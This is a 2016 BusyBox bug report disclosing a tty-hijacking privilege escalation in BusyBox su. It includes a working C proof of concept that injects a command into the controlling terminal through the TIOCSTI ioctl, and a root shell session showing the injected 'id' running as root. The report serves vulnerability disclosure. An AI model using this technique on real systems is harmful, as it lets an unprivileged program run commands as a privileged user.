[Bug 9401] New: privilege escalation with TIOCSTI ioctl from busybox su
bugzilla at busybox.net
Wed Nov 2 01:18:30 UTC 2016
https://bugs.busybox.net/show_bug.cgi?id=9401
Bug ID: 9401
Summary: privilege escalation with TIOCSTI ioctl from busybox su
Product: Busybox
Version: unspecified
Hardware: All
OS: Linux
Status: NEW
Severity: normal
Priority: P5
Component: Other
Assignee: unassigned at busybox.net
Reporter: _ at lizzie.io
CC: busybox-cvs at busybox.net
Target Milestone: ---
Created attachment 6796
--> https://bugs.busybox.net/attachment.cgi?id=6796&action=edit
use the TIOCSTI ioctl to write a command to the controlling tty
I noticed that Busybox su is vulnerable to tty hijacking with the
TIOCSTI ioctl. For example, this C program writes to the controlling
terminal and so can run arbitrary shell commands. With this, any
unprivileged program run with su can execute code as the calling user.
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdio.h>

int main()
{
    /* TIOCSTI queues one byte at a time as terminal input */
    for (char *cmd = "id\n"; *cmd; cmd++) {
        if (ioctl(STDIN_FILENO, TIOCSTI, cmd)) {
            fprintf(stderr, "++ ioctl failed: %m\n");
            return 1;
        }
    }
    return 0;
}
[lizzie at empress misc]$ gcc -Wall -Werror tiocsti.c -o tiocsti
[lizzie at empress misc]$ sudo bash
[root at empress misc]# ./busybox su -v
su: invalid option -- 'v'
BusyBox v1.26.0.git (2016-10-25 17:15:49 PDT) multi-call binary.
Usage: su [OPTIONS] [-] [USER]
Run shell under USER (by default, root)
-,-l Clear environment, run shell as login shell
-p,-m Do not set new $HOME, $SHELL, $USER, $LOGNAME
-c CMD Command to pass to 'sh -c'
-s SH Shell to use instead of user's default
[root at empress misc]# ./busybox su lizzie -c ./tiocsti
id
[root at empress misc]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
[root at empress misc]# ./busybox --version
Note that this was done without any user interaction beyond './busybox
su lizzie -c ./tiocsti'. Also worth noting that util-linux su prevents
this. (CVE-2005-4890 was a similar issue from 2005 in util-linux su).
[root at empress misc]# su --version
su from util-linux 2.28.2
[root at empress misc]# su lizzie -c tiocsti
bash: tiocsti: command not found
[root at empress misc]# su lizzie -c ./tiocsti
++ ioctl failed: Operation not permitted